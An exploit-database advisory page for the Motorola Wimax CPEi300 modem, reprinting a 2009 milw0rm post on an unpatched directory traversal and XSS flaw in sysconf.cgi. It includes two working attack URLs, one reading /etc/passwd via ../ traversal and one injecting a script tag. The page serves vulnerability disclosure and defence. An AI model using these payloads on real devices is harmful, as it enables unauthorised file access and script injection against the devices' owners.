Motorola Wimax modem CPEi300 Multiple Vulnerabilities

vendor:

Wimax modem CPEi300

by:

Usman Saeed

7.5

CVSS

HIGH

Directory traversal and XSS

22 (Improper Limitation of a Pathname to a Restricted Directory) and 79 (Improper Neutralization of Input During Web Page Generation)

CWE

Product Name: Wimax modem CPEi300

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Motorola Wimax modem CPEi300 Multiple Vulnerabilities

The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'page' parameter in 'sysconf.cgi' script. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site, or to traverse directories via directory traversal attacks.

Mitigation:

The vendor has not released any patch to address this vulnerability. As a workaround, it is recommended to restrict access to the vulnerable script.

Source

Exploit-DB raw data:

#####################################################################################
#
#   Name    :   Motorola Wimax modem CPEi300 Multiple Vulnerabilities
#   Author  :   Usman Saeed 
#   Company :   Xc0re Security Reasearch Group
#   Homepage :  http://www.xc0re.net
#
#####################################################################################


[Note: User needs to logged in! ]

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Exploitation : 

   [+] Directory traversal
	http://Hostname/cgi-bin/sysconf.cgi?page=../../../etc/passwd&action=request&sid=AeoFSFoI4lDs 

   [+] XSS 

	http://Hostname/cgi-bin/sysconf.cgi?page="><script>alert(1);</script>"&action=request&sid=AeoFSFoI4lDs  


# milw0rm.com [2009-01-29]